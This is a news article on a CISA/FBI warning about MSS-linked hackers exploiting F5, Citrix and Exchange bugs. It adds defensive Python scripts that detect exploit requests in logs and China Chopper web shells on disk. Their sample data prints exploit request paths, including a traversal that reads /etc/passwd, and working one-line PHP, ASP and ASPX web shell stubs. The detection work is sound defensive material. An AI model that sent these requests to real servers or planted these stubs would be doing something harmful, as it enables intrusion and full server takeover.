Tuesday, October 20, 15:51

China: Funds hackers for attacks on the US by exploiting Exchange, Citrix and F5 bugs!

The US government warns that Chinese state-funded hackers are carrying out attacks on government services by exploiting bugs in Microsoft Exchange servers and in Citrix and F5 devices.

More specifically, CISA and the FBI warn that hackers linked to China's Ministry of State Security (MSS) are attacking US government agencies and private companies by exploiting bugs in publicly exposed systems.

China vs USA

According to a recent indictment by the US Department of Justice, hackers linked to the MSS have targeted a range of industries in the US and other countries, including high-tech manufacturers, medical device manufacturers, civil services, educational institutions, pharmaceutical companies and the defense sector of the targeted countries. The attacks were carried out as part of a campaign lasting more than ten years, in which the hackers acted both for their own profit and on behalf of the Chinese MSS.

In their attacks, the China-linked hackers look for vulnerable, publicly exposed devices using the Shodan search engine and public vulnerability information such as CVE (Common Vulnerabilities and Exposures) entries and the NVD (National Vulnerability Database).


According to BleepingComputer, CISA has seen the hackers target bugs in F5, Citrix and Microsoft Exchange Server products to gain initial access to an organization's network and collect data. According to CISA, the most notable Exchange, Citrix and F5 bugs targeted by the hackers are the following:

  • CVE-2020-5902 (F5 BIG-IP): This bug allows a remote, unauthenticated attacker to reach the Traffic Management User Interface (TMUI) of the BIG-IP application delivery controller (ADC) and achieve remote code execution.
  • CVE-2019-19781 (Citrix VPN appliances): This bug in Citrix Application Delivery Controller (ADC), Citrix Gateway and Citrix SD-WAN WANOP allows unauthenticated attackers to execute arbitrary commands remotely and gain a foothold in the network.
  • CVE-2020-0688 (Microsoft Exchange Server): This bug sits in the Exchange Control Panel (ECP) component and is caused by Exchange failing to generate unique cryptographic keys at installation time, so every installation shares the same ViewState keys. An attacker holding any valid mailbox credentials can exploit it to achieve remote code execution (RCE) on the server with SYSTEM privileges.
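The three bugs above all leave a recognisable request shape in web-server access logs, which is the first place a defender should look. The following is an added example (not CISA's, BleepingComputer's or the article's code) that flags such requests. It assumes Apache/nginx "combined" log format (Exchange's IIS logs use the W3C format, so the line regex would need adapting there), and matches the request path after URL-decoding it twice because exploit tooling often double-encodes traversal sequences. The sample log lines are constructed for illustration.

```python
"""Flag web-server requests that look like exploitation attempts against the three
CVEs in the CISA/FBI alert (added example; not CISA's or the article's code).

Assumptions: logs are in Apache/nginx "combined" format, and the request path is
matched after URL-decoding. The sample lines are constructed for illustration.
"""
import re
from urllib.parse import unquote

# Each pattern is the request shape public exploit tooling sends for that CVE.
SIGNATURES = {
    # TMUI path-normalisation bypass: "..;" in the path reaches TMUI JSPs without authentication
    "CVE-2020-5902": re.compile(r"/tmui/.*\.\.;/", re.I),
    # Directory traversal from the unauthenticated /vpn/ tree into /vpns/ (config files, Perl scripts)
    "CVE-2019-19781": re.compile(r"/vpn/\.\./vpns/|/vpns/portal/scripts/", re.I),
    # ECP ViewState deserialisation: ViewState and its generator supplied on the query string
    "CVE-2020-0688": re.compile(r"/ecp/.*__VIEWSTATEGENERATOR=", re.I),
}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample lines: one hit per CVE, one double-encoded traversal, one benign request.
SAMPLE_LOG = """\
203.0.113.5 - - [20/Oct/2020:15:51:01 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 200 1337
198.51.100.7 - - [20/Oct/2020:15:52:13 +0000] "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1" 304 0
198.51.100.7 - - [20/Oct/2020:15:52:14 +0000] "GET /vpn/%2e%2e/vpns/portal/backdoor.xml HTTP/1.1" 200 300
192.0.2.9 - - [20/Oct/2020:15:53:30 +0000] "GET /ecp/default.aspx?__VIEWSTATEGENERATOR=B97B4E27&__VIEWSTATE=%2FwEPDwUKAAAAAAAAAA%3D%3D HTTP/1.1" 500 0
192.0.2.10 - - [20/Oct/2020:15:54:00 +0000] "GET /owa/auth/logon.aspx HTTP/1.1" 200 5000
"""


def normalize_target(target: str) -> str:
    """URL-decode twice: exploit tooling often double-encodes traversal sequences."""
    return unquote(unquote(target))


def scan(lines):
    """Return (cve, source_ip, status, raw_target) for every line matching a signature."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        decoded = normalize_target(m.group("target"))
        for cve, pattern in SIGNATURES.items():
            if pattern.search(decoded):
                hits.append((cve, m.group("ip"), m.group("status"), m.group("target")))
    return hits


def summarize(hits):
    """Count hits per CVE for a quick triage view."""
    counts = {}
    for cve, *_ in hits:
        counts[cve] = counts.get(cve, 0) + 1
    return counts


if __name__ == "__main__":
    found = scan(SAMPLE_LOG.splitlines())
    for cve, ip, status, target in found:
        print(f"{cve}  {ip}  HTTP {status}  {target}")
    print(summarize(found))
```

A match means an attempt, not a confirmed compromise: look at the status code and response size, and at what the same source did next (for example a later request for a file the first request would have written), before treating a host as breached.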

Once a network has been compromised, the Chinese-funded hackers download a set of tools that let them extend their access to other computers on that network. According to CISA, they commonly rely on the following tools:

Cobalt Strike: Cobalt Strike is a legitimate adversary simulation platform intended for security professionals assessing the security of a network. The hackers use its beacons, reached through crafted URIs, as a backdoor into compromised systems and to deploy additional tools on the target network.

China Chopper web shell: China Chopper is a small web shell (backdoor) whose server-side component exists in PHP, ASP, ASPX, JSP and CFM variants, which the hackers plant on publicly exposed web servers. Once installed, it gives them full control of the server through the exposed website, with commands sent as parameters of HTTP POST requests to the planted page.
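Because the server-side half of China Chopper is tiny, it can be hunted on disk with a handful of patterns. The following is an added example (not CISA's or the article's code) that scans a web root for the classic one-line PHP, ASP and ASPX stubs and records the request parameter each one evaluates, since that parameter name is what to search for in POST requests in the access logs. The JSP and CFM variants are larger scripts and are not matched here. The sample file contents and paths are constructed.

```python
"""Scan a web root for the one-line server-side stubs that the China Chopper client
drives (added example; not CISA's or the article's code).

Patterns cover the classic PHP, ASP and ASPX stubs; the JSP and CFM variants are
larger scripts and are not matched here. Sample file contents are constructed.
"""
import os
import re

# Each stub evaluates whatever arrives in one request parameter; the parameter name
# is the "password" the operator chose and is worth capturing for log correlation.
CHOPPER_PATTERNS = {
    "php":  re.compile(r"@?eval\s*\(\s*\$_(?:POST|REQUEST|GET)\s*\[\s*['\"]([^'\"]+)['\"]\s*\]\s*\)", re.I),
    "aspx": re.compile(r"eval\s*\(\s*Request\.Item\s*\[\s*['\"]([^'\"]+)['\"]\s*\]\s*,\s*['\"]unsafe['\"]\s*\)", re.I),
    "asp":  re.compile(r"(?:eval|execute)\s*\(?\s*request\s*\(\s*['\"]([^'\"]+)['\"]\s*\)", re.I),
}

WEB_EXTENSIONS = (".php", ".asp", ".aspx", ".ashx", ".jsp", ".cfm")


def scan_content(path, text):
    """Return one finding per stub found in `text`, tagged with the file path."""
    findings = []
    for family, pattern in CHOPPER_PATTERNS.items():
        for m in pattern.finditer(text):
            findings.append({"path": path, "family": family, "param": m.group(1)})
    return findings


def scan_tree(root):
    """Walk a directory and scan every script file; unreadable files are skipped."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(WEB_EXTENSIONS):
                continue
            full = os.path.join(dirpath, name)
            try:
                with open(full, "r", encoding="utf-8", errors="replace") as fh:
                    findings.extend(scan_content(full, fh.read()))
            except OSError:
                continue
    return findings


# Constructed sample files: three stubs and one benign page. Paths are hypothetical.
SAMPLES = {
    "/var/www/html/uploads/help.php": "<?php @eval($_POST['zb9']); ?>",
    "C:/inetpub/wwwroot/aspnet_client/sys.aspx":
        '<%@ Page Language="Jscript"%><%eval(Request.Item["cmd"],"unsafe");%>',
    "C:/inetpub/wwwroot/ecp/old.asp": '<%eval request("k")%>',
    "/var/www/html/index.php": "<?php echo 'hello'; ?>",
}


def scan_samples():
    """Run the content scanner over the constructed samples (in-memory, no disk access)."""
    findings = []
    for path, text in SAMPLES.items():
        findings.extend(scan_content(path, text))
    return findings


if __name__ == "__main__":
    for f in scan_samples():
        print(f"{f['family']:4}  param={f['param']:<6}  {f['path']}")
    # On a real host: for f in scan_tree("/var/www/html"): ...
```

Pattern matching catches the stock stubs only; operators routinely rename the eval call or encode it, so pair this with a review of script files whose creation time post-dates the last deployment and of POST requests to pages that normally receive only GETs.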

Mimikatz: Mimikatz is a tool that extracts Windows credentials held in a computer's memory. It is widely used by intruders, including ransomware operators, to obtain administrator credentials and take over Windows domain controllers.

Using these three tools, the hackers move from a compromised system to other devices until they control the entire targeted network. CISA also warns that the hackers are exploiting the Microsoft Exchange CVE-2020-0688 RCE bug to collect email from Exchange servers in Federal Government environments.

CISA and FBI recommendations

CISA and the FBI therefore recommend that agencies audit their infrastructure on a regular basis and keep their management plans up to date. They also advise regularly reviewing configuration and patch management programs to ensure that emerging threats can be monitored and mitigated. In this way agencies can head off the "operations" of sophisticated cyber threat actors and protect their resources and information.

